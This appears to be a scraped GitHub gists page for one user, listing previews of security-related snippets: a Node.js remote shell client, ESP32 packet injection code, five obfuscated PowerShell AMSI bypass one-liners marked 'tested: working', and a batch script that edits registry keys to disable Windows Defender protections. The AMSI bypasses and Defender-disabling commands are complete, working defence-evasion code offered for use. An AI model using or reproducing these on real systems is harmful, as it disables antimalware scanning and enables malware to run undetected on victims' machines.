Hannn GetRektBoy724

💀
goofy ahh
  • Indonesia
@GetRektBoy724
GetRektBoy724 / Client.js
Created June 3, 2019 18:54 — forked from roccomuso/Client.js
Node.js remote shell example
var net = require('net')
var readline = require('readline')
/**
* @class Client
* @param host {String} the host
* @param port {Integer} the port
*/
function Client (host, port) {
this.host = host
@GetRektBoy724
GetRektBoy724 / esp32_promisc.c
Created August 31, 2020 13:18 — forked from brainstorm/esp32_promisc.c
esp32 promiscuous mode and packet injection experiments
// Espressif ESP32 promiscuous mode and packet injection experiments
// by brainstorm at nopcode org
#include "freertos/FreeRTOS.h"
#include "esp_wifi.h"
#include "esp_wifi_internal.h"
#include "lwip/err.h"
#include "esp_system.h"
#include "esp_event.h"
#include "esp_event_loop.h"
Invoke-Expression 'AMSI Test Sample: 7e72c3ce-861b-4339-8740-0ac1484c1386'
@GetRektBoy724
GetRektBoy724 / amsibypass.ps1
Last active August 19, 2021 15:33
Matt Graeber's AMSI Bypass - Modified By Me - Old School But It's Working, Why Not?
[Ref].Assembly.GetType('S'+'y'+'s'+'t'+'e'+'m'+'.'+'M'+'a'+'n'+'a'+'g'+'e'+'m'+'e'+'n'+'t'+'.'+'A'+'u'+'t'+'o'+'m'+'a'+'t'+'i'+'o'+'n'+'.'+'A'+'m'+'s'+'i'+'U'+'t'+'i'+'l'+'s').GetField('a'+'m'+'s'+'i'+'I'+'n'+'i'+'t'+'F'+'a'+'i'+'l'+'e'+'d','N'+'o'+'n'+'P'+'u'+'b'+'l'+'i'+'c,'+'S'+'t'+'a'+'t'+'i'+'c').SetValue($null,$true)
@GetRektBoy724
GetRektBoy724 / amsibypass2.ps1
Last active August 19, 2021 15:33
Matt Graeber's Reflection Bypass - Modified by https://amsi.fail 1 - tested : working
[Ref].Assembly.GetType($([CHAR]([BYtE]0x53)+[ChAR]([bYtE]0x79)+[cHAr]([byTe]0x73)+[CHar](116)+[CHaR]([BYTE]0x65)+[cHaR](104+5)+[CHAr]([ByTe]0x2E)+[CHAr](50+27)+[cHAr](186-89)+[CHaR](9900/90)+[CHaR](60+37)+[CHaR]([Byte]0x67)+[chAr]([BytE]0x65)+[CHar]([bYtE]0x6D)+[CHAr]([BYTE]0x65)+[CHaR]([bYtE]0x6E)+[ChAr](188-72)+[Char](1610/35)+[chAR](455/7)+[chaR]([bYTE]0x75)+[CHAR](136-20)+[CHAR]([BYTe]0x6F)+[chaR]([byTE]0x6D)+[char](97)+[chaR]([Byte]0x74)+[chaR](4410/42)+[chAr](72+39)+[Char](7920/72)+[cHAR]([bytE]0x2E)+[chaR](65)+[cHAR]([Byte]0x6D)+[Char]([bytE]0x73)+[chaR](5670/54)+[ChAR]([bYte]0x55)+[CHAR](150-34)+[Char]([ByTe]0x69)+[char](108)+[chAr](115))).GetField(''+$([SYSTEM.NEt.webUTiliTY]::hTmLDEcoDE('amsi'))+'InitFailed','NonPublic,Static').SetValue($null,$true);
@GetRektBoy724
GetRektBoy724 / amsibypass3.ps1
Created January 8, 2021 11:50
Matt Graeber's Reflection method with WMF5 autologging bypass - Modified by https://amsi.fail - tested: working
[Delegate]::CreateDelegate(("Func``3[String, $(([String].Assembly.GetType('System.Reflection.BindingFlags')).FullName), System.Reflection.FieldInfo]" -as [String].Assembly.GetType('System.Type')), [Object]([Ref].Assembly.GetType('System.Management.Automation.'+$([cHar]([bytE]0x41)+[cHAr](44+65)+[ChAR]([BYtE]0x73)+[ChAr](126-21))+'Utils')),($([sYStem.Net.wEBUtilITy]::hTmLdecODe('GetField')))).Invoke(''+$([cHAR]([bYtE]0x61)+[chAR]([bYte]0x6D)+[ChaR](2990/26)+[cHaR](5985/57))+'InitFailed',(('NonPublic,Static') -as [String].Assembly.GetType('System.Reflection.BindingFlags'))).SetValue($null,$True);
@GetRektBoy724
GetRektBoy724 / amsibypass4.ps1
Last active August 19, 2021 15:33
Matt Graeber's Reflection Bypass Method - Modified by https://amsi.fail 2 - Old school but it's working, why not? - tested: working
[Ref].Assembly.GetType($([sYSTEM.Net.WebuTILITy]::HTmldECODE('System.Management.Automation.AmsiUtils'))).GetField(''+$([sYstEm.net.webutilIty]::hTMldECOde('amsi'))+'InitFailed','NonPublic,Static').SetValue($null,$true);
@GetRektBoy724
GetRektBoy724 / amsibypass5.ps1
Last active January 1, 2023 12:46
Matt Graeber's Reflection Bypass Method - Modified by https://amsi.fail 3 - Old school but it's working, why not? - tested: working - shortest AMSI bypass I have
[Ref].Assembly.GetType('System.Management.Automation.'+$([cHAr]([ByTE]0x41)+[cHAr]([byte]0x6D)+[ChAR](115)+[char]([bYtE]0x69))+'Utils').GetField($([systeM.NET.WEbUtIliTY]::HtMldECoDe('amsiInitFailed')),'NonPublic,Static').SetValue($null,$true);
@GetRektBoy724
GetRektBoy724 / disable_windows_defender.bat
Created January 27, 2021 09:18 — forked from pe3zx/disable_windows_defender.bat
Disable Windows Defender on Windows 10 1903
rem USE AT OWN RISK AS IS WITHOUT WARRANTY OF ANY KIND !!!!!
rem https://technet.microsoft.com/en-us/itpro/powershell/windows/defender/set-mppreference
rem To also disable Windows Defender Security Center include this
rem reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
rem 1 - Disable Real-time protection
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
@GetRektBoy724
GetRektBoy724 / pdb_parser_lite.cpp
Created December 18, 2022 12:50 — forked from namazso/pdb_parser_lite.cpp
A lightweight PDB parser that retrieves type and symbol CodeView streams.
/* MIT License
*
* Copyright (c) namazso 2018
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions: